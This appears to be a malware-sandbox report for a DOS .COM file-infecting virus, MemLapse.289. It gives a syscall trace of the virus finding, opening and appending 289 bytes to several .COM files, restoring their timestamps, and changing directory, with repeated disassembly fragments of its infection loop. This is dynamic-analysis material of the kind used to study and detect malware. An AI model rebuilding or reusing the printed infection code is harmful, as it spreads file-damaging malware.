Sample viewer

vx.netlux.org/Virus.DOS.MemLapse.289

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:42.39865896Z 26 PC: 12a5e | Set disk transfer address
2018-12-17T22:51:42.400621666Z 78 PC: 12a67 | Find first file
2018-12-17T22:51:42.407364839Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.408841446Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.411949574Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.41483679Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.437823401Z 61 PC: 12a97 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:42.445948089Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.454896132Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.456806228Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.458772754Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.474197834Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.475945121Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.485280049Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.488816379Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.491644355Z 64 PC: 12b0a | Write file or device (Write 33 bytes on handle 5)
2018-12-17T22:51:42.495103093Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.49843906Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.50759651Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.510837566Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.513595337Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.51685675Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.518221666Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.521027061Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.522966567Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.534635286Z 61 PC: 12a97 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:51:42.54239947Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.550942986Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.552443397Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.55380771Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.557178945Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.558729012Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.561649115Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.56641437Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.568840242Z 64 PC: 12b0a | Write file or device (Write 163 bytes on handle 5)
2018-12-17T22:51:42.571829611Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.578643587Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.58676137Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.590462647Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.592224971Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.595322087Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.59692227Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.608676959Z 61 PC: 12a97 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:51:42.616233676Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.62366979Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.625531683Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.627852325Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.631072483Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.63293917Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.636762144Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.639466689Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.642246521Z 64 PC: 12b0a | Write file or device (Write 166 bytes on handle 5)
2018-12-17T22:51:42.652241082Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.653996119Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.663261363Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.677041345Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.678651522Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.681536115Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.683495648Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.694689818Z 61 PC: 12a97 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:51:42.701058644Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.706947931Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.709266996Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.711571138Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.713581859Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.715451886Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.717543427Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.719400481Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.723349362Z 64 PC: 12b0a | Write file or device (Write 41 bytes on handle 5)
2018-12-17T22:51:42.726834945Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.728784839Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.738524766Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.741549815Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.742913994Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.75011964Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.751991169Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.755548704Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.757772068Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.76950121Z 61 PC: 12a97 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:51:42.778484495Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.783614159Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.785189633Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.786617177Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.788607217Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.791138986Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.794412797Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.796858002Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.800331611Z 64 PC: 12b0a | Write file or device (Write 44 bytes on handle 5)
2018-12-17T22:51:42.803368499Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.805071104Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.814297904Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.817248081Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.818734367Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.83272117Z 61 PC: 12a97 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:51:42.840816066Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.848747291Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.851691038Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.863817442Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.866748551Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.868259685Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.877292204Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.879583955Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.881877434Z 64 PC: 12b0a | Write file or device (Write 174 bytes on handle 5)
2018-12-17T22:51:42.885693843Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.887314006Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.89671422Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.900382458Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.901684657Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.912315344Z 61 PC: 12a97 | Open file (Filename = 'PAH.COM')
2018-12-17T22:51:42.92089224Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.928279393Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.930086007Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.93273181Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.936020079Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.937935594Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.941434697Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.944120848Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.946866483Z 64 PC: 12b0a | Write file or device (Write 177 bytes on handle 5)
2018-12-17T22:51:42.95029841Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.95219951Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.964416702Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.968395047Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.969937583Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.980740464Z 61 PC: 12a97 | Open file (Filename = 'TEST.COM')
2018-12-17T22:51:42.988069459Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.990955128Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.993060343Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.995573716Z 59 PC: 12b27 | Change current directory
2018-12-17T22:51:43.000991053Z 26 PC: 12b33 | Set disk transfer address